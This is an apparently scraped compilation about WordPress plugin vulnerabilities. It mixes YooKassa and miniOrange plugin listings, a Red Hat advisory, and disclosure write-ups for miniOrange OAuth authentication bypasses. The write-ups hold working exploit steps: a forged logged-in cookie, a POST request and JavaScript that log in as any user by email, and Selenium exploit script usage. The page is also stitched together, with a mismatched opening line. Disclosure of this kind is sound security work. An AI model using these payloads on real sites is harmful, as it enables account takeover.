The affected device stores sensitive information in cleartext, which may allow an authenticated user to access session data stored in the OAuth database belonging to legitimate users

CVE-2022-2569

Cross-Site Request Forgery (CSRF) leading to plugin settings update in YooMoney ?Kassa ??? WooCommerce plugin <= 2.3.0 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Важно**

Плагин «ЮKassa» разработан для WooCommerce 3.7 и выше.

The YooKassa plugin is compatible with WooCommerce version 3.7 or later.

**Описание**

Плагин «ЮKassa» – платежное решение для сайтов на WooCommerce:

*   включает 12 способов приема платежей,
*   подходит для юрлиц и ИП,
*   деньги поступают на банковский счет компании.

**Description**

The YooKassa plugin is the payment solution for websites that use WooCommerce:

*   includes 12 payment acceptance methods,
*   suitable for companies and entrepreneurs,
*   settlements are made to the company’s bank account.

**Настройка плагина**

Чтобы принимать платежи через плагин, нужно подать заявку на подключение ЮKassa и заключить договор с компанией «ЮMoney» (онлайн).  
После этого вы получите нужные настройки.  
Инструкция по установке и настройке плагина

**Plugin configuration**

To accept payments via the plugin, apply for onboarding with YooKassa and enter into a contract with YooMoney (online).  
We will send you the required settings afterwards.

**Поддержка передачи данных чека**  
Если вы настраивали отправку чеков в налоговую через партнеров ЮKassa (по 54-ФЗ), в настройках модуля надо включить отправку данных для чека.  
Помощь ЮKassa отправка чеков по 54-ФЗ

**We support the transmission of receipts**  
If you configured the transmission of receipts to the Tax service via YooKassa (in accordance with Federal Law No. 54-FZ), enable the transmission of receipt data in the settings.  
YooKassa’s guide for transmission of receipts in accordance with Federal Law No. 54-FZ

**Тарифы**

Подключение ЮKassa и настройка плагина – бесплатно. Комиссия за прием платежей – от 2,8%.  
Посмотреть все тарифы на сайте ЮKassa

**Rates**  
Onboarding with YooKassa and plugin configuration are free of charge. The commission for accepting payments starts at 2.8%.  
View all rates at the YooKassa website

**Все возможности ЮKassa**

После подключения ЮKassa доступны:  
\* 12 способов приема платежей. Карты, электронные кошельки, интернет-банки, сервисы онлайн-кредитования, наличные, баланс телефона. Вы сами выбираете, какие способы нужны, и перечисляете их в договоре. Кнопки оплаты можно разместить на своем сайте или на сайте ЮMoney: выберите подходящий вариант при настройке плагина.  
\* Личный кабинет на сайте ЮKassa. В нем можно делать возвраты платежей, выставлять и отправлять счета, общаться с менеджерами ЮKassa.

Перейти на сайт ЮKassa

**All features of YooKassa**

After the onboarding, you can access:

12 payment acceptance methods. Cards, e-wallets, online banking, installment plan services, cash, phone balance. Select the methods by yourself and specify them in the contract. You can place the payment buttons at your website or at the YooKassa website: choose the suitable option when setting up the plugin.  
Your own Merchant Profile at the YooKassa website. Use it to make refunds, create and send invoices, or contact the YooKassa manager.  
Visit the YooKassa website

Этот контора мошенники! Они вводят людей в заблуждение. После регистрации на юмони, вы не сможете принимать платежи. Они собирают о вас информацию и ни известно что потом с ней делают.

It is lightweight and work. Other not matter.

Read all 3 reviews

“ЮKassa для WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    yoomoney

**2.4.0**

*   Добавлен метод оплаты СБП с выбором на стороне сайта
*   Обновление SDK до версии 2.5.1

**2.3.3**

*   Исправлена ошибка повторной обработки уже полученных уведомлений от ЮKassa
*   Обновление SDK до 2.4.2

**2.3.2**

*   Добавлена возможность разрешать пользователям сохранять карту после успешной оплаты

**2.3.1**

*   Добавлена проверка роли пользователя при сохранении настроек (разрешено только administrator и manage\_woocommerce)
*   Добавлена проверка токена и сам токен в формах настроек для защиты от CSRF
*   Обновление SDK до 2.4.1

**2.3.0**

*   Добавлен способ авторизации в Юkassa через OAuth.
*   Добавлена подписка на уведомления через OAuth токен
*   Обновлен интерфейс настройки модуля
*   Добавлен перевод
*   Обновлен SDK до версии 2.3.0

**2.2.5**

*   Отключен способ оплаты Webmoney
*   Обновлен SDK до версии 2.2.6

**2.2.4**

*   Изменена инициализация виджета
*   Обновлен SDK до версии 2.2.5

**2.2.3**

*   Обновлен SDK до версии 2.2.2

**2.2.2**

*   Обновлен SDK до версии 2.1.8

**2.2.1**

*   Очистка корзины при оплате через виджет

**2.2.0**

*   Замена Сбербанк Онлайн на SberPay
*   Исправлена работа по очистке корзины
*   Добавлен файл переводов для en локали
*   Обновлен SDK до версии 2.1.7

**2.1.5**

*   Исправление конвертации стоимости товара и доставки

**2.1.4**

*   Курсы валют с учетом номинала
*   Обновлен SDK до версии 2.1.3

**2.1.3**

*   Заменён файл верификации для ApplePay

**2.1.2**

*   Поддержка сайтов без ЧПУ
*   Обновлен SDK до версии 2.1.2

**2.1.1**

*   Игнорируем заказы с другими платежными системами

**2.1.0**

*   Установка системы налогообложения
*   Исправлена ошибка пересчета кредитования при изменении способа доставки
*   Небольшие поправки
*   Обновлен SDK до версии 2.1.0

**2.0.4**

*   Поддержка плагина WPML при возврате с формы оплаты
*   Обновлен SDK до версии 2.0.7

**2.0.3**

*   Работа вкладок на странице настроек при конфликте bootstrap

**2.0.2**

*   Форматирование номера телефона для чеков
*   Обновлен SDK до версии 2.0.5

**2.0.1**

*   Сохранение всех попыток оплаты с привязкой к заказу

**2.0.0**

*   Публикация в магазине приложений

CVE-2022-36379: ЮKassa для WooCommerce

Authentication Bypass vulnerability in miniOrange WP OAuth Server plugin <= 3.0.4 at WordPress.



The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrator role on the client’s website.

**Let’s check the plugin**

The _mo_get_logged_user_from_auth_cookie() function get logged in user with the following code:

    $auth_cookie = wp_parse_auth_cookie( '', 'logged_in' );
    
    if ( ! $auth_cookie || is_wp_error( $auth_cookie ) || ! $auth_cookie['token'] || ! $auth_cookie['username'] ) {
    	return false;
    }}

We can see from the code that it uses the wp_parse_auth_cookie() function. Which is a completely faulty use in this case, as it does not use authentication. Description of the function:

> Authentication cookie components. None of the components should be assumed to be valid as they come directly from a client-provided cookie value.

It is clearly described that the returned value is not validated. But the plugin doesn’t use any validation.

**Let’s see how we can exploit this vulnerability**

All we have to do is set a logged in cookie that contains the username. The other values can be anything, as there is no validation in the plugin.

The default logged in cookie name is:

    define( 'LOGGED_IN_COOKIE', 'wordpress_logged_in_' . COOKIEHASH );

where the hash is:

    define( 'COOKIEHASH', md5( $siteurl ) );

So in the https://lana.solutions/vdb/miniorange-oauth-server which is a test WordPress website:

57a442d3cd2a47583304a69461f75869, which is the result of the following function:

    echo md5('https://lana.solutions/vdb/miniorange-oauth-server');

If we set the following cookie, we can authenticate ourselves as a test user on the OAuth server:

    wordpress_logged_in_57a442d3cd2a47583304a69461f75869=test%7Canything%7Canything%7Canything;

Let’s try it in the easiest way. I created a JavaScript code for the exploit that set the logged in cookie.

So we can even do this through a browser by opening the server’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-server/, then going to the console and entering the following code:

    document.cookie="wordpress_logged_in_57a442d3cd2a47583304a69461f75869=test%7Canything%7Canything%7Canything";

Then open the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/wp-admin and log in using the Single Sign On button.

**The professional exploit script**

I created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange\_oauth\_server\_plugin\_vdb\_exploit\_with\_selenium.py

How to use:

    python3 miniorange_oauth_server_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --server_url="https://lana.solutions/vdb/miniorange-oauth-server/" --username="test"

Run the above command in the Linux (desktop version) terminal.

How the exploit works step by step:

*   Opens OAuth server website
*   Sets the logged in cookie with the “test” username
*   Opens OAuth client website
*   Click Single Sign On button (so it starts OAuth authentication)

**Try it**

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/

CVE-2022-34149: WP OAuth Server (Login with WordPress) by miniOrange WordPress plugin Authentication Bypass

Authentication Bypass vulnerability in miniOrange WP OAuth Server plugin <= 3.0.4 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

WP OAuth Server plugin turns your WordPress site into an OAuth Server. It allows you to login into Rocket Chat, Invision Community, WordPress, Odoo, EasyGenerator, Salesforce, Zapier, Moodle, Edunext, Wickr, Freshdesk, FreshWorks, ServiceNow, Knack database, Circlo.so, Tribe.so, Tribe, Mobilize, Nextcloud, Church Online, iSpring LMS, Nextcloud, Academy of Mine, BoardEffect, TalentLMS, PowerSchool and any other OAuth 2.0 compliant applications using WordPress credentials.

Basically, the OAuth Server plugin allows users to login into applications that are OAuth 2.0 compliant, using their WordPress login credentials. As it’s name suggests, it follows the OAuth 2.0 protocol. Along with that, it also supports OpenID Connect (OIDC), and JWT protocols.

The primary goal of the OAuth Server plugin is to enable Single Sign On so that users do not need to remember username and password for each application.  
Once Single Sign On is enabled, users do not need to store sensitive information to login into different applications.

**LIST OF POPULAR OAUTH CLIENTS SUPPORTED**

*   Rocket.Chat
*   Invision Community (IPB Forum)
*   Odoo
*   WordPress
*   EasyGenerator
*   Salesforce
*   Zapier
*   Moodle
*   Edunext
*   Wickr
*   Freshdesk
*   FreshWorks
*   ServiceNow
*   Knack database
*   Circle.so
*   Tribe.so
*   Mobilize
*   Nextcloud
*   iSpring LMS
*   Church Online
*   Academy of Mine
*   BoardEffect

**WORDPRESS OAUTH / OPENID CONNECT SERVER USE CASES**

*   If you want to use your WordPress site as an Identity Server / OAuth Server / OAuth Provider and use WordPress user’s login credentials to login into your client site / application then you can use this plugin. You can also decide what kind of User data / attributes you want to send while Single Sign On into your client site / application.
*   If you want to login to your Mobile app / Single Page web app (SPA) using your WordPress credentials, then you can use the Authorization code with PKCE flow grant type to achieve your use case.
*   Single set of credentials will be used to login to multiple WordPress websites.
*   You can access the NIGINX resources using NIGINX Authentication. Once you login into your client application using WP OAuth Server credentials, you will get JWT. Your client application can further use it for NGINX Authentication.

**WORDPRESS OAUTH / OPENID CONNECT SERVER FREE VERSION FEATURES**

*   Supports Login with WordPress for Single Client application
*   Protocol Support – OAuth 2.0, OpenID Connect (OIDC)
*   Master Switch – Block / unblock OAuth API calls between OAuth Clients and Server
*   Token Length – Change the access token length
*   Server Response – Sends User ID, username, email, first name, last name, display name in the response
*   Grant types Supported – Authorization Code grant
*   OAuth API Documentation
*   Setup guides to configure the plugin with various OAuth Clients (more coming soon)

**WORDPRESS OAUTH / OPENID CONNECT SERVER PREMIUM VERSION FEATURES**

*   All FREE version features
*   Supports Login with WordPress for Multiple Client applications
*   Server Response – Sends all the profile attributes along with roles, allows to send custom attributes from usermeta table and also customize the attribute names that need to be sent in server response
*   Grant Types Supported : Authorization Code Grant, Implicit Grant, Password Grant, Client Credentials Grant, Refresh Token Grant, Authorization Code grant with PKCE flow
*   Token Lifetime – Configure the access token and refresh token expiry time
*   Enforce State Parameter – Based on client configuration, you can enable or disable state parameter
*   Authorize / Consent prompt – Enable / disable the consent screen
*   Redirect/Callback URI Validation – Enable / disable this feature, based on dynamic redirect to a different pages for certain conditions
*   Multi-Site Support – Use the plugin in WordPress Multisite network environment
*   JWT Signing Algorithm – Supports signing algorithms HSA and RSA
*   Additional endpoints – Provides OpenID Connect Discovery endpoint, Introspection endpoint, OpenID Connect Single logout endpoint  
    A grant is a method of acquiring an access token. Deciding which grants to implement depends on the type of client the end user will be using, and the experience you want for your users.

**WE SUPPORT FOLLOWING GRANTS:**

*   **Authorization code grant** : This code grant is used when there is a need to access the protected resources on behalf of the user on another third party application.
*   **Implicit grant** : This grant relies on resource owner and registration of redirect uri. In authorization code grant users need to ask for authorization and access token each time, but here access token is granted for a particular redirect uri provided by a client using a particular browser.
*   **Client credential grant** : This grant type heads towards specific clients, where access token is obtained by client by only providing client credentials. This grant type is quite confidential.
*   **Resource owner password credentials grant** : This type of grant is used where the resource owner has a trust relationship with the client. Just by using username and password, provided by resource owner authorization and authentication can be achieved.
*   **Refresh token grant** : Access tokens obtained in OAuth flow eventually expire. In this grant type client can refresh his or her access token.
*   **Authorization code grant with PKCE flow** : This grant type is used for public clients like mobile and native apps, Single Page web apps, where there is a risk of client secret being compromised.

**REST API AUTHENTICATION**

Rest API is very much open to interact. Creating posts, getting information of users and much more is readily available.  
It secures unauthorized access to your WordPress sites/pages using our WordPress REST API Authentication plugin .

**From your WordPress dashboard**

1.  Visit Plugins > Add New
2.  Search for OAuth 2.0 server. Find and Install OAuth 2.0 server
3.  Activate the plugin from your Plugins page

**From WordPress.org**

1.  Download OAuth 2.0 server.
2.  Unzip and upload the miniorange-oauth-login directory to your /wp-content/plugins/ directory.
3.  Activate miniOrange OAuth from your Plugins page.

**I need to customize the plugin or I need support and help?**

Please email us at info@xecurify.com or Contact us. You can also submit your query from plugin’s configuration page.

Initial setup was giving my team some issues and we were able to get walked through a drupal to wordpress sso setup with the team at miniorange.

The plugin works without problems, and our Wordpress site's login is now working smooth. Very helpful and capable Support, who has answered in a fast manner. They get directly to the point and answer the questions with rich answers that makes even a (in the context of SSO) less experienced user understand what is happening.

The free version of this plugin worked great for my use case. I had some issues initially that ended up being on the side of my hosting provider, but the support I received by the developers of this plugin was well beyond what I would have expected.

I tried this plugin to link Wordpress with Invision Community (IPS). According to the docs at Invision, there are 2 ways to do this. I chose the first one linking IPS to WP as the server as opposed to IPS acting as the server. My review is based on this experience but I'll try the other way too. It quick and easy to set up, and clearly there's a large amount of work gone into it, but once I'd got the connection configured, that's when I found that the logins expire after just 600 seconds, that's just 10 minutes! According to the support section, it says this is fixed at 3600 seconds, unless you upgrade to the pro. But 10 mins isn't an hour, which would be okay at minimum for a WP site member to browse and compose a comment or review on Gallery images, post in a forum etc in Invision Community forming part of the same site. Secondly, probably 90%+ of this plugin is locked down and almost everything seems to say you need to upgrade to pro. Instead of 7 tabs full of settings and options you can't use, why not create a simpler lite version with a non-intrusive ad for the pro version benefits? If you want a simple Single Sign On OAUTH solution to link your WP user accounts to your IPS accounts and sync basic profile info for the convenience of your visitors but then forget about it, it will do the job but as crippled as it is, this probably isn't what you are looking for, unless you want the pro support and anything beyond the bare minimum.

We were very impressed with the level of support given by the miniorange team. During our development we ran into a few problems due to other plugins and our custom application, which caused problems for logout. However, the miniorange team was great they were quick to respond to our questions and even attended a zoom session with us to help track down the problem. Definitely one of the best plugin authors for support. I've worked with many and these guys are second to none.

We ended up not buying the plugin but we have to admit the pre-sales support was stellar including pro-actively reaching us to help configure it.

Read all 27 reviews

“WP OAuth Server ( Login with WordPress )” is open source software. The following people have contributed to this plugin.

Contributors

**4.0.1**

*   Vulnerability fixes
*   Code improvements

**3.0.4**

*   Token Post Response header already sent warning fix

**3.0.3**

*   Database Query Optimization

**3.0.2**

*   CORS issue fix
*   Added trial option of the premium
*   Licensing page changes

**3.0.1**

*   Added compatibility with WP 5.9
*   Improved performance of website by setting autoload to false

**3.0.0**

*   Support for email attribute in the userinfo endpoint
*   Link to the OAuth API documention
*   Client specific UI improvements

**2.13.8**

*   Security Fixes

**2.13.7**

*   UI improvement – Copy button for endpoints and client credentials
*   Bug fix for supplied\_redirect\_uri
*   Consent screen on every login

**2.13.6**

*   permission\_callback warning fix

**2.13.5**

*   minor bug fixes
*   added copy button to copy the client credentials and endpoints
*   readme update

**2.13.4**

*   minor UI updates
*   added compatibility with WP 5.7

**2.13.3**

*   minor bug fixes
*   fixed compatibility with Brizzy
*   added compatibility with WP 5.6

**2.13.2**

*   minor bug fixes
*   fixed issue with deactivation form
*   added compatibility with WP 5.5

**2.13.1**

*   Added compatibility with WordPress v5.5

**2.13.0**

*   Added UI fixes
*   Updated demo plan fixes
*   Minor bugfixes and compatibility fixes

**2.12.4**

*   Licensing tab fix

**2.12.3**

*   Added fixes for some features
*   Added option to disable authorize screen

**2.12.2**

*   Added Compatibility with WordPress v5.4

**2.12.0**

*   Performance Improvements

**2.11.0**

*   Fixed bug where blank scope led to blank screen
*   Fixed “Deny” button resulting in clicking “Allow”
*   Fixed unaccounted bytes error notice on activation
*   Updated plugin licensing
*   Minor UI Improvements

**2.10.0**

*   Added fixes for Loopback Request failure
*   Updated Endpoints based on REST API and Authorize Consent Screen
*   Minor Bugfixes

**2.9.1**

*   Fixed migration issue

**2.9.0**

*   Fixed bug where bearer access\_token was not recognized.
*   Updated Endpoints

**2.8.2**

*   Updated Installation Steps

**2.8.1**

*   Compatibility changes for miniOrange OAuth Single Sign On

**2.8.0**

*   Updated registration form
*   Advertised Introspection Endpoint

**2.7.0**

*   Added compatibility for WordPress Version 5.2
*   Added fixes for OpenID Connect flow
*   Added fixes for OTP related issue
*   Updated Endpoints
*   Added alternative for Sign Up
*   Advertised Scope Based Response

**2.6.1**

*   Fixed conflicts for function generateRandomString()

**2.6.0**

*   Advertised new features as per new Licensing Plan

**2.5.6**

*   Added Compatibility for Rocket.chat

**2.5.5**

*   Fixed OTP related issue

**2.5.4**

*   Updated Licensing Plan

**2.5.3**

*   Added Visual Tour fixes

**2.5.2**

*   Added bugfixes

**2.5.1**

*   Added missing files

**2.5.0**

*   New Features
*   Major UI Revamp
*   Added Feature Tour

**2.4.0**

*   Compatibility with WordPress 5.1

**2.3.0**

*   Added Feedback Form and Updated UI

**2.2.1**

*   Added support for Invision Community and Rocket.chat

**2.2.0**

*   Updated UI

**2.1.0**

*   Fixed the PHP7.2 Compatibility issue

**2.0.3**

*   Changes in the title

**2.0.2**

*   Added features

**2.0.1**

*   Added support for multiple client

**1.0.1**

*   Initial Release

CVE-2022-34149: WP OAuth Server ( Login with WordPress )

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.



The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the client’s website.

**Let’s check the plugin**

The mo_oauth_login_validate() function includes the following request handling:

    if ( isset( $_REQUEST['option'] ) and strpos( $_REQUEST['option'], 'mooauth' ) !== false ) {
    
    	$user_email = '';
    	if ( array_key_exists( 'email', $_POST ) ) {
    		$user_email = sanitize_email( $_POST['email'] );
    	}
    	
    	if ( $user_email ) {
    		if ( email_exists( $user_email ) ) { // user is a member
    			$user    = get_user_by( 'email', $user_email );
    			$user_id = $user->ID;
    			wp_set_auth_cookie( $user_id, true );
    		} else { // this user is a guest
    			$random_password = wp_generate_password( 10, false );
    			$user_id         = wp_create_user( $user_email, $random_password, $user_email );
    			wp_set_auth_cookie( $user_id, true );
    		}
    	}
    	wp_redirect( home_url() );
    	exit;
    }

We can see from the code that if we specify $_POST['email'], the plugin will log the user in using the wp_set_auth_cookie() function. No verification or authentication. Nothing.

The other problem with the plugin is that if we give an email address in the request that does not exist in the database, it will create a new user, even if registration on the WordPress website is not enabled.

**Let’s see how we can exploit this vulnerability**

We only need to send a POST request to exploit this vulnerability.

The HTTP request to the https://lana.solutions/vdb/miniorange-oauth-client/ which is a test WordPress website:

    POST /vdb/miniorange-oauth-client/ HTTP/1.1
    Host: lana.solutions
    Content-Type: application/x-www-form-urlencoded
    
    option=mooauth&[email protected]

Let’s try it in the easiest way. I created a JavaScript code for the exploit that sends a POST request:

So we can even do this through a browser by opening the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/, then going to the console and entering the following code:

    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://lana.solutions/vdb/miniorange-oauth-client/', true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onload = function() {
    	window.location.href = 'https://lana.solutions/vdb/miniorange-oauth-client/wp-admin/';
    }
    xhr.send('option=mooauth&[email protected]');

After successful login, the script will redirect us to the WordPress admin.

**The exploit script**

I created a Python script that returns the WordPress logged\_in cookie:

Source: miniorange\_oauth\_client\_plugin\_vdb\_get\_exploit\_cookie.py

How to use:

    python3 miniorange_oauth_client_plugin_vdb_get_exploit_cookie.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux terminal.

We get something like this:

    wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6

Then all we have to do is use a cookie, such as JavaScript, in the browser console in the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/

    document.cookie="wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6"; location.reload();

**The professional exploit script**

I also created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange\_oauth\_client\_plugin\_vdb\_exploit\_with\_selenium.py

How to use:

    python3 miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux (desktop version) terminal.

**Try it**

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/

**Additional tests**

I created a Postman request for exploit: Postman Web – MiniOrange Auth Request

Can be used by anyone after fork. The required variables are stored in the collection.

CVE-2022-34858: OAuth 2.0 client for SSO by miniOrange WordPress plugin Authentication Bypass

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.

 Verified

 Fixed

**5.9**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Find out about vulnerable plugins in your websites for free.

 Scan your website 

Software

 OAuth 2.0 client for SSO

Type

Plugin

Vulnerable versions

 <= 1.11.3

Fixed in

 1.11.4

PSID 

f26589749d3c

CVE ID 

 CVE-2022-34858

Classification 

Bypass Vulnerability

OWASP Top 10 

A2: Broken Authentication

Credits

 Lana Codes

Publicly disclosed

2022-08-02

**Details**

Authentication Bypass vulnerability discovered by Lana Codes in WordPress OAuth 2.0 client for SSO plugin (versions <= 1.11.3).

**Solution**

Update the WordPress OAuth 2.0 client for SSO plugin to the latest available version (at least 1.11.4).

**References**

CVE-2022-34858: WordPress OAuth 2.0 client for SSO plugin <= 1.11.3 - Authentication Bypass vulnerability - Patchstack

Red Hat Security Advisory 2022-6051-01 - An update is now available for RHOL-5.5-RHEL-8. Issues addressed include denial of service, man-in-the-middle, and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Logging Subsystem 5.5.0 - Red Hat OpenShift security update  
Advisory ID:       RHSA-2022:6051-01  
Product:           RHOL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6051  
Issue date:        2022-08-18  
CVE Names:         CVE-2021-38561 CVE-2022-0759 CVE-2022-1012  
                   CVE-2022-1292 CVE-2022-1586 CVE-2022-1785  
                   CVE-2022-1897 CVE-2022-1927 CVE-2022-2068  
                   CVE-2022-2097 CVE-2022-21698 CVE-2022-30631  
                   CVE-2022-32250  
====================================================================  
1. Summary:

An update is now available for RHOL-5.5-RHEL-8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.5.0 - Red Hat OpenShift

Security Fix(es):

* kubeclient: kubeconfig parsing error can lead to MITM attacks  
(CVE-2022-0759)

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks  
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-1415 - Allow users to tune fluentd  
LOG-1539 - Events and CLO csv are not collected after running `oc adm must-gather --image=$downstream-clo-image `  
LOG-1713 - Reduce Permissions granted for prometheus-k8s service account  
LOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created.  
LOG-2134 - The infra logs are sent to app-xx indices  
LOG-2159 - Cluster Logging Pods in CrashLoopBackOff  
LOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages.  
LOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL  
LOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext.  
LOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not  be collected.  
LOG-2242 - Log file metric exporter is still following /var/log/containers files.  
LOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed  
LOG-2264 - Logging link should contain an icon  
LOG-2274 - [Logging 5.5] EO doesn't recreate secrets kibana and kibana-proxy after removing them.  
LOG-2276 - Fluent config format is hard to read via configmap  
LOG-2290 - ClusterLogging Instance status in not getting updated in UI  
LOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1  
LOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint.  
LOG-2300 - [Logging 5.5]ES pods can't be ready after removing secret/signing-elasticsearch  
LOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck  
LOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously  
LOG-2333 - Journal logs not reaching Elasticsearch output  
LOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record.  
LOG-2342 - [Logging 5.5] Kibana pod can't connect to ES cluster after removing secret/signing-elasticsearch: "x509: certificate signed by unknown authority"  
LOG-2384 - Provide a method to get authenticated from GCP  
LOG-2411 - [Vector] Audit logs forwarding not working.  
LOG-2412 - CLO's loki output url is parsed wrongly  
LOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type  
LOG-2418 - EO supported time units don't match the units specified in CRDs.  
LOG-2439 - Telemetry: the managedStatus&healthStatus&version values are wrong  
LOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift  
LOG-2444 - The write index is removed when `the size of the index` > `diskThresholdPercent% * total size`.  
LOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster.  
LOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack.  
LOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices  
LOG-2474 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]  
LOG-2522 - CLO supported time units don't match the units specified in CRDs.  
LOG-2525 - The container's logs are not sent to separate index if the annotation is added after the pod is ready.  
LOG-2546 - TLS handshake error on loki-gateway for FIPS cluster  
LOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector.  
LOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data  
LOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated.  
LOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate  
LOG-2599 - Supported values for level field don't match documentation  
LOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert  
LOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect  
LOG-2619 - containers violate PodSecurity -- Log Exporation  
LOG-2627 - containers violate PodSecurity -- Loki  
LOG-2649 - Level Critical should match the beginning of the line as the other levels  
LOG-2656 - Logging uses deprecated v1beta1 apis  
LOG-2664 - Deprecated Feature logs causing too much noise  
LOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster  
LOG-2693 - Integration with Jaeger fails for ServiceMonitor  
LOG-2700 - [Vector] vector container can't start due to "unknown field `pod_annotation_fields`" .  
LOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance  
LOG-2725 - Upgrade logging-eventrouter Golang  version and tags  
LOG-2731 - CLO keeps reporting `Reconcile ServiceMonitor retry error` and `Reconcile Service retry error` after creating clusterlogging.  
LOG-2732 - Prometheus Operator pod throws 'skipping servicemonitor' error on Jaeger integration  
LOG-2742 - unrecognized outputs when use the sts role secret  
LOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs  
LOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows "active_primary" instead of "active" shards.  
LOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo  
LOG-2763 - [Vector]{Master} Vector's healthcheck fails when forwarding logs to Lokistack.  
LOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image  
LOG-2765 - ingester pod can not be started in IPv6 cluster  
LOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy  
LOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx  
LOG-2773 - No cluster-logging-operator-metrics  service in logging 5.5  
LOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack.  
LOG-2784 - Japanese log messages are garbled at Kibana  
LOG-2793 - [Vector] OVN audit logs are missing the level field.  
LOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF  
